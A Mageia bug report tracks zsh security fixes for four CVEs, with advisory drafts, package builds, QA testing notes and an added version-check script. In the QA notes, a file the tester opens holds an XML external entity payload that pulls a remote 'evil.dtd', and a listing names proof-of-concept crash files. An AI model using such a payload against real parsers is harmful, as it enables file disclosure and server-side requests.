| Summary: | zsh new security issues CVE-2017-1820[56] and CVE-2018-754[89] | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | major | ||
| Priority: | Normal | CC: | smelror, sysadmin-bugs, tarazed25 |
| Version: | 6 | Keywords: | advisory, has_procedure, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA6-64-OK | ||
| Source RPM: | zsh-5.4.2-1.mga7.src.rpm | CVE: | |
| Status comment: | |||
Description
David Walser
2018-03-11 15:12:39 CET
David Walser
2018-03-11 15:12:46 CET
Whiteboard: (none) => MGA6TOO

The first four CVEs only affect Mageia 5, which we won't be fixing. CVE-2017-18206 and CVE-2018-7548 don't affect Mageia 5. CVE-2017-1820[56] are already fixed in the version in Cauldron. CVE-2018-754[89] affect both Mageia 6 and Cauldron.

Summary: zsh new security issues CVE-2014-1007[0-2], CVE-2016-10714, CVE-2017-1820[56], CVE-2018-754[89] => zsh new security issues CVE-2017-1820[56] and CVE-2018-754[89]
Stig-Ørjan Smelror
2018-03-12 00:12:27 CET
Assignee: bugsquad => smelror

Advisory
========
Zsh has been updated to fix 2 security issues.
It was discovered that Zsh incorrectly handled certain inputs. An attacker could possibly use this to execute arbitrary code. This issue only affected Ubuntu 17.10. (CVE-2018-7548)
It was discovered that Zsh incorrectly handled certain inputs. An attacker could possibly use this to cause a denial of service. (CVE-2018-7549)
References
==========
https://usn.ubuntu.com/3593-1/
https://nvd.nist.gov/vuln/detail/CVE-2018-7548
https://nvd.nist.gov/vuln/detail/CVE-2018-7549
Files
=====
Uploaded to core/updates_testing:
zsh-5.3.1-1.1.mga6
zsh-doc-5.3.1-1.1.mga6
from zsh-5.3.1-1.1.mga6.src.rpm
Stig-Ørjan Smelror
2018-03-12 00:24:37 CET
Whiteboard: MGA6TOO => (none)

Zsh for Cauldron has also been updated. You forgot CVE-2017-1820[56] for Mageia 6.

CC: (none) => qa-bugs

Advisory
========
Zsh has been updated to fix 4 security issues.
In builtin.c in zsh before 5.4, when sh compatibility mode is used, there is a NULL pointer dereference during processing of the cd command with no argument if HOME is not set. (CVE-2017-18205)
In utils.c in zsh before 5.4, symlink expansion had a buffer overflow. (CVE-2017-18206)
In subst.c in zsh through 5.4.2, there is a NULL pointer dereference when using ${(PA)...} on an empty array result. (CVE-2018-7548)
In params.c in zsh through 5.4.2, there is a crash during a copy of an empty hash table, as demonstrated by typeset -p. (CVE-2018-7549)
References
==========
https://usn.ubuntu.com/3593-1/
https://nvd.nist.gov/vuln/detail/CVE-2017-18205
https://nvd.nist.gov/vuln/detail/CVE-2017-18206
https://nvd.nist.gov/vuln/detail/CVE-2018-7548
https://nvd.nist.gov/vuln/detail/CVE-2018-7549
Files
=====
Uploaded to core/updates_testing:
zsh-5.3.1-1.2.mga6
zsh-doc-5.3.1-1.2.mga6
from zsh-5.3.1-1.2.mga6.src.rpm

Assignee: smelror => qa-bugs
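
Added example (not part of the original bug report or of Mageia's tooling): a shell check that maps a Mageia 6 zsh VERSION-RELEASE string to the fixes named in the two advisory drafts above. The ordering is a simplified rpm-style comparison, the function names are hypothetical, and the 5.3.1-1.mga6 sample input is constructed.

```shell
#!/bin/sh
# Added example. Simplified rpm-style ordering: no epoch, tilde or caret handling.
FIXED_ALL="5.3.1-1.2.mga6"    # from the page: build that covers all four CVEs
FIXED_2018="5.3.1-1.1.mga6"   # from the page: earlier build, CVE-2018-754[89] only

# evr_cmp A B: print -1, 0 or 1 for two VERSION-RELEASE strings.
evr_cmp() {
  awk -v a="$1" -v b="$2" '
    # Split s into maximal runs of digits or letters; everything else separates.
    function runs(s, out,   n) {
      n = 0
      while (match(s, /[0-9]+|[A-Za-z]+/)) {
        out[++n] = substr(s, RSTART, RLENGTH)
        s = substr(s, RSTART + RLENGTH)
      }
      return n
    }
    function cmp(p, q,   P, Q, np, nq, i, x, y, xn, yn) {
      np = runs(p, P); nq = runs(q, Q)
      for (i = 1; i <= np && i <= nq; i++) {
        x = P[i]; y = Q[i]; xn = (x ~ /^[0-9]/); yn = (y ~ /^[0-9]/)
        if (xn && yn) { if (x + 0 != y + 0) return (x + 0 < y + 0) ? -1 : 1 }
        else if (xn != yn) return xn ? 1 : -1   # a numeric run beats an alphabetic one
        else if (x != y) return (x < y) ? -1 : 1
      }
      return (np == nq) ? 0 : ((np < nq) ? -1 : 1)
    }
    function ver(s) { return match(s, /-[^-]*$/) ? substr(s, 1, RSTART - 1) : s }
    function rel(s) { return match(s, /-[^-]*$/) ? substr(s, RSTART + 1) : "" }
    BEGIN { r = cmp(ver(a), ver(b)); if (r == 0) r = cmp(rel(a), rel(b)); print r }'
}

# zsh_cve_coverage EVR: which of the fixes listed on the page a Mageia 6 build carries.
zsh_cve_coverage() {
  case "$1" in *.mga6) ;; *) echo "unknown"; return 0 ;; esac   # thresholds are mga6-only
  if [ "$(evr_cmp "$1" "$FIXED_ALL")" -ge 0 ]; then echo "all-four"
  elif [ "$(evr_cmp "$1" "$FIXED_2018")" -ge 0 ]; then echo "cve-2018-only"
  else echo "unpatched"; fi
}

# Sample inputs (5.3.1-1.mga6 is constructed); on a real host pass the output of
#   rpm -q --qf '%{VERSION}-%{RELEASE}' zsh
for evr in 5.3.1-1.mga6 5.3.1-1.1.mga6 5.3.1-1.2.mga6 5.4.2-1.mga7; do
  printf '%s -> %s\n' "$evr" "$(zsh_cve_coverage "$evr")"
done
```

Builds that do not end in .mga6, such as the Cauldron 5.4.2-1.mga7 source package named in the bug header, report "unknown" because the page gives no fixed Cauldron version to compare against.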
David Walser
2018-03-12 00:42:07 CET
CC: qa-bugs => (none)

Testing this for Mageia 6 in x86_64 virtualbox.

Installed zsh. Switched user to the Z shell and logged out and in. zsh was active and presented a dialogue for setting up .zshrc. Typing 0 results in a .zshrc containing only a comment.
Some useful notes at http://fendrich.se/blog/2012/09/28/no/

Played with the directory commands then updated from updates testing under su. As user ran some of the commands again and used vi to write this report. Familiar commands continued to work as in bash.

Globbing examples

List all files greater than 20KB in size:
$ ls -l pocs/**(Lk+20)
-rw-r--r-- 1 lcl lcl 38109 Sep 28 17:35 pocs/gx_ttfReader__Read
-rw-r--r-- 1 lcl lcl 38109 Sep 28 17:34 pocs/Ins_IP
-rw-r--r-- 1 lcl lcl 38109 Sep 28 17:37 pocs/Ins_JMPR
-rw-r--r-- 1 lcl lcl 38109 Sep 28 17:30 pocs/Ins_MDRP
-rw-r--r-- 1 lcl lcl 38109 Sep 28 16:27 pocs/Ins_MIRP
-rw-r--r-- 1 lcl lcl 788480 Jul 26 2017 pocs/memory-leak-in-ReadPCDImage-9.pcd
-rw------- 1 lcl lcl 50888704 Sep 28 23:25 pocs/vgcore.1260
-rw------- 1 lcl lcl 50888704 Sep 29 09:52 pocs/vgcore.4428

Edit the file input.xml wherever it is in the directory structure starting at the current directory.
$ pwd
/home/lcl/pad
$ vi **/input.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]>
$ ls qa/xml/public
EGPH.TXT input.xml output.xml

It would take a few days at least to become familiar with writing functions, which I think would go into the .zshrc file just like in .tcshrc and then be used as commands, so let's skip that part.

Global aliases are a new thing and presumably these would normally reside in .zshrc. For this test defining one on the command-line shall suffice.
$ alias -g L="|less"
$ cat L notebook/notes.belexeuli
q
That turns cat into a pager.

The shell is working for 64-bits.

CC: (none) => tarazed25

Re comment 6: yes, 'cat L' is obviously redundant but it shows the principle of global aliases.

Good work Len. Advisory uploaded. Validating.

Keywords: (none) => advisory, has_procedure, validated_update

An update for this issue has been pushed to the Mageia Updates repository.
https://advisories.mageia.org/MGASA-2018-0168.html

Resolution: (none) => FIXED